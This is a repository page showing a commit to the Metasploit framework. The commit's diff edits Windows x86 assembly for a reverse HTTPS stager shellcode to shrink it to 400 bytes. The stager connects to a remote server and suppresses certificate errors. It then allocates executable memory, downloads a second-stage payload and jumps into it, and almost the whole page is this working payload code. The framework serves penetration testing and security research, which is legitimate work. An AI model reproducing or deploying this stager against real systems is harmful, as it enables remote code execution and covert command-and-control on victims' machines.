adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Size tweaks to bring the ssl stager + encoder + target_id to exactly 400 bytes

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@8998 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore
2010-04-03 07:48:53 +00:00
parent e4a17dd0ca
commit c8defe9716
4 changed files with 56 additions and 53 deletions
Download Patch File Download Diff File Expand all files Collapse all files
external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
Vendored
+27 -23
View File
@@ -28,7 +28,7 @@ internetopen:
call ebp
mov esi, eax ; save the HINTERNET handle
jmp get_server_host
jmp dbl_get_server_host
internetconnect:
pop ebx ; Save the hostname pointer
@@ -43,7 +43,6 @@ internetconnect:
push esi ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
mov esi, eax ; hConnection
jmp get_server_uri
@@ -65,19 +64,19 @@ httpopenrequest:
push edx ; version
push ecx ; url
push edx ; method
push esi ; hConnection
push eax ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
httpsendrequest:
xor eax, eax
push eax ; optional length
push eax ; optional
push eax ; dwHeadersLength
push eax ; headers
xor ebx, ebx
push ebx ; optional length
push ebx ; optional
push ebx ; dwHeadersLength
push ebx ; headers
push esi ; hHttpRequest
push 0x7B18062D ; hash( "wininet.dll", "InternetCloseHandleA" )
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
call ebp
test eax,eax
jnz short allocate_memory
@@ -88,23 +87,33 @@ check_ssl:
; but its required to use this payload without a valid signed cert.
push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" )
call ebp
cmp eax, 12045 ; ERROR_INTERNET_INVALID_CA
cmp al, 0x0d ; ERROR_INTERNET_INVALID_CA (0x2f0d)
jne failure
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
mov eax, esp
push 4 ; sizeof(dwFlags)
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
pop eax ; clear temporary storage
; pop eax ; clear temporary storage (optional)
; Try it again
jmp short httpsendrequest
dbl_get_server_host:
jmp get_server_host
get_server_uri:
call httpopenrequest
server_uri:
db "/12345", 0x00
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
@@ -113,43 +122,38 @@ allocate_memory:
push byte 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (8Mb ought to do us)
push byte 0 ; NULL as we dont care where the allocation is.
push ebx ; NULL as we dont care where the allocation is (zero'd from the prev function)
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
push ebx ; store a copy of the stage base address on the stack
push byte 0 ; temporary storage for bytes read count
push ebx ; temporary storage for bytes read count
mov edi, esp ; &bytesRead
download_more:
push edi ; &bytesRead
push 8192 ; 8k read
push ebx ; buffer as the length, seems to work (Win7)
push ebx ; buffer
push esi ; hRequest
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
call ebp
test eax,eax ; download failed?
test eax,eax ; download failed? (optional?)
jz failure
mov eax, [edi]
add ebx, eax ; buffer += bytes_received
test eax,eax
test eax,eax ; optional?
jnz download_more ; continue until it returns 0
pop eax ; clear the temporary storage
execute_stage:
ret ; dive into the stored stage address
get_server_uri:
call httpopenrequest
server_uri:
db "/123456789", 0x00
get_server_host:
call internetconnect